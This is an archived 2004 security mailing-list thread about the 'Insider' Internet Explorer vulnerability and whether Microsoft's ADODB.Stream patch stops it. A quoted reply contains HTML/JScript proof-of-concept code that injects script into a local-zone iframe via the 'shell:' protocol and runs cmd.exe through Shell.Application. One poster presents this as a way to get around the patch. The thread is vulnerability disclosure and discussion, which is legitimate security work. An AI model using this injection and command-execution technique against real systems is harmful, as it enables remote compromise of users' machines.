lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <200407031524.i63FOtLs029773@web170.megawebservers.com>
Date: Sat, 3 Jul 2004 15:24:55 -0000
From: <liudieyu@...rella.name>
To: "Jelmer" <jkuperus@...net.nl>, <liudieyu@...rella.name>,
   <bugtraq@...urityfocus.com>, <NTBugtraq@...tserv.ntbugtraq.com>,
   <full-disclosure@...ts.netsys.com>
Subject: RE: THE VULNERABILITY STILL WORKS AFTER TODAY'S PATCH




at the very beginning, using shell.application is not "another" way - it's
actually the only solution available for the general public. most of
profitable systems to crack today have norton.antivirus.enterprise.xxxx
installed - which means MS-ITS& Adodb.Stream are disabled. i must admit,
norton.antivirus did stop the insider exploit - this time. 

so, a real malicious attacker with normal intel would never simply copy the
public exploit(which involves MS-ITS and ADODB.STREAM) and send it to his
targets - he'll use shell.application instead of adodb.stream.

the most weired thing is the following fact:
norton is securing windows faster than microsoft.
(the latter is OS PRODUCER, while the former is ANTIVIRUS)

Jelmer <jkuperus@...net.nl> said:

> Well it's not quite as easy as you make it sound
> I think you only took a look at http-equiv's example I posted to full
> disclosure and based your post on that. You see this:
> 
> 
> --snip--
> 
> <iframe src="c:\windows\web\tip.htm"
> style="width:400px;height:200px;"></iframe>
> 
> <textarea id="code" style="display:none;">
>   injected.
>   <script language="JScript" DEFER>
>     alert('attempting injection');
>     var obj=new ActiveXObject("Shell.Application");
>     obj.ShellExecute("cmd.exe","/c pause");
>   </script>
> </textarea>
> 
> <script language="javascript">
>     
>     function doit() {
>       document.frames[0].document.body.insertAdjacentHTML('afterBegin',
> document.all.code.value);
>     }
>     setTimeout("doit()", 2000);
> </script>
> 
> --snip--
> 
> Doesn't work, It gives an access denied exception
> But this..
> 
> 
> --snip--
> 
> <iframe src="shell:windows\web\tip.htm"
> style="width:400px;height:200px;"></iframe>
> 
> 
> <textarea id="code" style="display:none;">
>   injected.
>   <script language="JScript" DEFER>
>     alert('attempting injection');
>     var obj=new ActiveXObject("Shell.Application");
>     obj.ShellExecute("cmd.exe","/c pause");
>   </script>
> </textarea>
> 
> 
> <script language="javascript">
>     
>     function doit() {
>       document.frames[0].document.body.insertAdjacentHTML('afterBegin',
> document.all.code.value);
>     }
>     setTimeout("doit()", 2000);
> </script>
> 
> --snip--
> 
> 
> ..does, notice the subtle difference.
> The iframe in the 2nd example is set to shell:windows\web\tip.htm 
> Instead of the hard coded c:\windows\web\tip.htm
> And it works. It was http-equiv whom probably by a mixture of luck and gut
> instinct thru experience found this out when we where doing some mailing
> back and forth to tackle some unrelated problem
> If you'd actually tried to exploit it you would have known this
> 
> 
> 
> -----Original Message-----
> From: full-disclosure-admin@...ts.netsys.com
> [mailto:full-disclosure-admin@...ts.netsys.com] On Behalf Of
> liudieyu@...rella.name
> Sent: zaterdag 3 juli 2004 3:28
> To: bugtraq@...urityfocus.com; NTBugtraq@...tserv.ntbugtraq.com;
> full-disclosure@...ts.netsys.com
> Subject: [Full-Disclosure] THE INSIDER VULNERABILITY STILL WORKS AFTER
> TODAY'S PATCH
> 
> 
> 
> FROM: Liu Die Yu - http://umbrella.name/
> TO  : bugtraq@...urityfocus.com, NTBugtraq@...tserv.ntbugtraq.com,
> full-disclosure@...ts.netsys.com
> SUBJ: THE INSIDER VULNERABILITY STILL WORKS AFTER TODAY'S PATCH
> DATE: 2004/07/03 UTC+800
> BODY:
> 
> [background]
> the latest 0day remote compromise exploit for internet explorer was found
> being used in the wild. :-)
> 
> "the-insider" exploit was first noticed by the-insider:
> http://umbrella.name/iebug.com/display-singlemessage.php?readmsg:fulldisclos
> ure_message-2004060050
> and then documented by jelmer:
> http://umbrella.name/iebug.com/display-singlemessage.php?readmsg:fulldisclos
> ure_message-2004060124
> http://62.131.86.111/analysis.htm 
> 
> microsoft just released:
> Critical Update for Microsoft Data Access Components - Disable ADODB.Stream
> object from Internet Explorer (KB870669)
> http://www.microsoft.com/downloads/details.aspx?FamilyID=4D056748-C538-46F6-
> B7C8-2FBFD0D237E3&DisplayLang=en
> which kills the old exploit.
> 
> [FIX FOR THE PATCH]
> use Shell.Application instead.
> 
> [service]
> both "attack service"(finding bugs) and "defense service"(securing systems):
> http://umbrella.name/
> 
> [greetings]
> malware( http://www.malware.com/ ) who found Shell.Application.
> 
> [signature]
> LIUDIEYU
> liudieyu AT umbrella . name
> 
> 
> 
> 



-- 



_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ